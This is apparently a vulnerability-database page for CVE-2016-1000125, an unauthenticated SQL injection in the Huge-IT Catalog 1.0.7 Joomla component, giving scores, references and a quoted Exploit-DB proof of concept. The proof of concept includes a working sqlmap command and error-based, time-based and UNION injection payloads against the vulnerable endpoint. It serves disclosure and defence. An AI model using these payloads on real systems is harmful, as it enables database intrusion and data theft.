CVE-2016-1000125

critical

Published 2016-10-06 · Modified 2026-05-06

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

9.8

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS v4 NEW

—

not yet in upstream

VIR risk

10.0

Description

Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla

Predictions

Exploit likelihood

97%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-42598 webapps php text · 2 KB

Larry W. Cashdollar · 2017-08-31

Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection

text exploit Source: Exploit-DB

# Exploit Title Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
# Date: 2016-09-16
# Exploit Author: Larry W. Cashdollar, @_larry0
# Vendor Homepage: http://huge-it.com/joomla-catalog/
# Software Link: 
# Version: 1.0.7
# Tested on: Linux
# CVE : CVE-2016-1000125
# Advisory: http://www.vapidlabs.com/advisory.php?v=171
# Exploit:
	• $ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php' --data="prod_page=1&post=load_more_elements_into_catalog&catalog_id=*&old_count=*&count_into_page=*&show_thumbs=*&show_description=*&parmalink=*"
	•  
	• Parameter: #1* ((custom) POST)
	•     Type: error-based
	•     Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
	•     Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
	•  
	•     Type: AND/OR time-based blind
	•     Title: MySQL >= 5.0.12 time-based blind - Parameter replace
	•     Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
	•  
	•     Type: UNION query
	•     Title: Generic UNION query (random number) - 15 columns
	•     Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
	• ---
	• [16:48:10] [INFO] the back-end DBMS is MySQL
	• web server operating system: Linux Debian 8.0 (jessie)
	• web application technology: Apache 2.4.10
	• back-end DBMS: MySQL >= 5.0.12
	• [16:48:10] [WARNING] HTTP error codes detected during run:
	• 500 (Internal Server Error) - 6637 times
	• [16:48:10] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
	•  
	• [*] shutting down at 16:48:10

Application impact

Vendor	Product	Versions	Fixed
huge-it	huge-it_catalog	`1.0.7`

References

CWEs

CWE-89

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.